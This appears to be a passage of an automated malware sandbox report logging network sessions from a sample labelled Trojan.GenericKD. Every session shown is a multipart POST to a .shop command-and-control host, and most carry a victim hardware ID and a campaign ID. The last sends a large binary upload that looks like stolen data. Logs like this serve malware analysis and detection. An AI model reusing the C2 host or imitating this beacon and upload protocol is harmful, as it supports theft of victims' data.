                                              2024-05-03 03:28:21 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:21 UTC814INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=uhhm97spj0g045can9aei6gveo; expires=Mon, 26-Aug-2024 21:15:00 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIvVEx23q%2F%2B8K69P1TkcwY79CNOri%2FyyNioYzulshlPzkK0vMAH9mRe3vgqGJp1I1hq342VQE6TULM8yswUXXEdpVrgeoMS%2B65a89NcckxIxGH8mS3ayfWaBg1jWn%2BIqPG2qV7DHSOW5T74%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd291539d40cd5-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:21 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 0d 0a
                                              Data Ascii: 11ok 191.96.227.219
                                              2024-05-03 03:28:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.649715104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:22 UTC290OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 15100
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:22 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:23 UTC812INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=eprkn64kvdmb6n5hgh46o8s7e2; expires=Mon, 26-Aug-2024 21:15:02 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfiPWDRxvTzu4CCpxVKjTt4u7LU1BA5OEojND59lNjB6WQ%2FWhtBGunHgztINXsjr6tkFK1Ff6k%2FfUh7%2FI4Ld5K%2Fs7cAI35nchNIsnzjhQybEl0heTPZztAbGbPvhXSTONfSxQHax4iujzWk%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd291e5e955e60-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 0d 0a
                                              Data Ascii: 11ok 191.96.227.219
                                              2024-05-03 03:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.649717104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:23 UTC290OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 19958
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:23 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                              Data Ascii: +?2+?2+?o?Mp5p_
                                              2024-05-03 03:28:24 UTC810INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=rr0o8ehmumtd74qrm62fm3mtrs; expires=Mon, 26-Aug-2024 21:15:03 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6456qk8YLjK0VcSIIMqSNFLZN9ba%2FQ8ZquEbByteXS3BhfOU6WqnFozvC5bfa5j0vmi7jwwDvtHMI6JjIPoA5Db2tmqFlHdC6gFU1YADLZR1JxI33Z%2F06vYj6z%2FCZgUTcjt88u9e2cL0kg%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd29262f9d4216-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:24 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 0d 0a
                                              Data Ascii: 11ok 191.96.227.219
                                              2024-05-03 03:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.649718104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:24 UTC289OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 5429
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:24 UTC5429OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:25 UTC814INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=hkjjr86vfta1lpij9ckt3bu2f5; expires=Mon, 26-Aug-2024 21:15:04 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAfqfH%2BqpagUQK7MAsLYLIQzJOzlJtJs6yBLZu%2FSGmKwePMBlFTya%2Ft9R4x2VsxLJT8fEdpFpcOKCi%2BARixBg9nVI2zwYlCrWoXUhnoJalrnBFFCcw%2FZmNJQGokNWaHEGYIo9bdqAGfxR1M%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd292c4afd0f95-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 0d 0a
                                              Data Ascii: 11ok 191.96.227.219
                                              2024-05-03 03:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.649719104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:25 UTC289OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 1391
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:25 UTC1391OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:26 UTC814INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=fihuathl21o9g8k5lj4g9q20gi; expires=Mon, 26-Aug-2024 21:15:04 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2n%2FOLD%2FM%2B3610LedWVZxg3JGTj6d5oZYsJfYeEz262WdmMUN3zPqzFSeTKH92hhS2xwmgZkfVMta1eb%2F9ouUhtG1YYfQHeX1WARrlJo0hLbyUIbnwfxd34SMawA8em6%2BOmVwqJfVbJycK8%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd29300b97c3f0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:26 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 0d 0a
                                              Data Ascii: 11ok 191.96.227.219
                                              2024-05-03 03:28:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.649720104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:26 UTC291OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 576004
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 42 42 38 34 42 34 36 46 34 46 32 45 39 37 44 46 39 30 30 30 43 36 43 32 30 45 43 46 37 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 39 4f 4f 52 34 2d 2d 0d 0a 2d 2d 62
                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DBB84B46F4F2E97DF9000C6C20ECF71--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Z9OOR4----b
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: ab 6f 0d 27 ba e8 34 57 76 57 1b 63 53 11 24 eb ce d7 2b 36 08 d2 1c a2 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84
                                              Data Ascii: o'4WvWcS$+6;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 0b 2c bd 07 01 27 4b 39 2f 45 76 ac 90 f8 e0 78 2f 16 d8 00 7b 80 e5 f1 f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb
                                              Data Ascii: ,'K9/Evx/{qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 78 3c 7e f7 df 44 be 4d fa 0b fe c5 84 ec 7f 5b 57 92 aa c6 b8 8a fd a5 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d
                                              Data Ascii: x<~DM[WldYfga[#[))f3srh_:[<PX*>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kb*g2A5yaD&ERhEDm
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: ef 03 44 3d 5a bf c1 77 ed d3 5f 78 eb 95 74 7a 20 a3 a5 a0 ff fe 84 cb 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12
                                              Data Ascii: D=Zw_xtz <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e
                                              2024-05-03 03:28:26 UTC15331OUTData Raw: 95 bb 8e 39 8b a7 1e e7 8b a3 75 96 80 93 78 d2 a0 d2 ab e6 a6 2a 0a 13 bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca
                                              Data Ascii: 9ux*j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f|YYA:O9/;k+Cxfe2J%)$b5#Re
